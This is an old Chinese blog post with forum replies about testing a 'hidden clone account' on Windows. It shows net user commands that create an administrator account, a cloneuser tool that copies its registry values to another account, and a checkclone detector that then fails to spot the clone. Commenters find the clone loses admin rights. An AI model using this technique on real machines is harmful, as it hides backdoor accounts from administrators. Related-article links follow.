隐形的克隆帐号测试(测试成功^_^)(ALLyeSNO)

原创 2004年12月29日 16:23:00

利用了 检测程序的漏洞

通过比较 注册表的 f 和 v键值

C:/WINNT/system32>net user allyesno babybear /add
命令成功完成。

C:/WINNT/system32>net localgroup administrators allyesno /add
命令成功完成。


C:/WINNT/system32>net user hideclone babybear /add
命令成功完成。


C:/WINNT/system32>cloneuser allyesno hideclone

C:/WINNT/system32>net user allyesno /delete
命令成功完成。

C:/WINNT/system32>net user hideclone
用户名 hideclone
本地组会员 *Users
全局组成员 *None
命令成功完成。

检测


[Melody]#checkclone

No Clone Is Found

Check Account Clone Complete

[Melody]#^_^ 成功



WinEggDrop
我怀疑被克隆的帐号是否还具有Administrators组的权限.


zzzevazzz
opentelnet
然后用hideclone登陆telnet,再尝试启动或停止服务。
如果可以,那就是admin。

WinEggDrop
it's not in Administrators group is the original account is deleted


allyesno
嗯 失去了 ad的权限 wineggdrop的置疑是正确的

另外倒是引出了 我的另一个思路 刚才已经测试过了

通过这个方法 将原有的ad权限帐号A 克隆成其他ad权限的帐号B

然后再把B进行删除 虽然 这个A帐号在查看的时候仍然是在administrators组 但是已经不具备ad权限 通过这个 可以做一些帐号限制

不知道 我这个想法 还有什么瑕疵吗?

微信公众号开发测试帐号

官方链接:http://mp.weixin.qq.com/debug/cgi-bin/sandbox?t=sandbox/login 扫描关注后登录 需要填写接口配置,一个公网能访问的域名,推荐用...
  • joefany
  • joefany
  • 2018年01月10日 10:26
  • 125

测试mysql数据库安装成功

import java.sql.*;import java.util.*;import java.io.*;import java.sql.*;public class mysql ...{    C...
  • qq7187057
  • qq7187057
  • 2007年06月08日 20:15
  • 2498

测试redis有没有装成功小例子

范例: $redis = new redis();   $redis->connect('127.0.0.1', 6379);   $redis->set('test',"1111111...
  • qq_37610423
  • qq_37610423
  • 2017年06月08日 10:20
  • 349

测试mysql 是否连接成功

测试mysql 连接是否 ok
  • mchgogo
  • mchgogo
  • 2016年04月28日 14:50
  • 405

Python安装与小demo测试

1、下载Python 和 第三方开发工具PyScripter 2、安装 电脑(Win7 64bit)刚开始安装的是64位的Python,后来发现PyScript是32位的(在安装的时候选择下一...
  • shanjianxiliulc
  • shanjianxiliulc
  • 2016年12月22日 17:14
  • 709

tomcat的安装、配置和测试

下面想大家介绍最常见的服务器tomcat的安装、配置和测试,以后有机会也会向大家介绍另外一款服务器jetty的安装和配置, 1. tomcat的下载,大家到http://tomcat.apache....
  • zimohongcheng001
  • zimohongcheng001
  • 2013年02月24日 00:12
  • 702

nginx负载均衡安装及测试

nginx负载均衡安装及测试 1、配置3台机器 A服务器IP :192.168.157.128 (主) B服务器IP :192.168.157.136 C服务器IP :192.16...
  • u010220089
  • u010220089
  • 2016年04月26日 17:06
  • 2083

关于性能测试时的隐性杀手--日志级别

前端时间,测试人员再做性能测试时,发现TPS 非常地低,一直搞不明白怎么回事。 查看线程堆栈,发现很多线程在 争夺 日志文件。最后发现日志级别为DEBUG,那个汗。。。。 由此,想了一下,...
  • yysct2005
  • yysct2005
  • 2013年04月22日 16:21
  • 800

hadoop学习笔记(一)——hadoop安装及测试

这几天乘着工作之余,学习了一下hadoop技术,跌跌撞撞的几天,终于完成了一个初步的hadoop的安装及测试,具体如下: 动力:工作中遇到的数据量太大,服务器已经很吃力,sql语句运行老半天,故想用大...
  • thinkpadshi
  • thinkpadshi
  • 2015年05月14日 14:32
  • 6415

测试Hibernate连接数据库是否成功

@Test     public void testHibernatConfig(){         Configuration config = new Configuration();     ...
  • lovezhaohaimig
  • lovezhaohaimig
  • 2016年10月03日 22:24
  • 1915
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:隐形的克隆帐号测试(测试成功^_^)(ALLyeSNO)
举报原因:
原因补充:

(最多只允许输入30个字)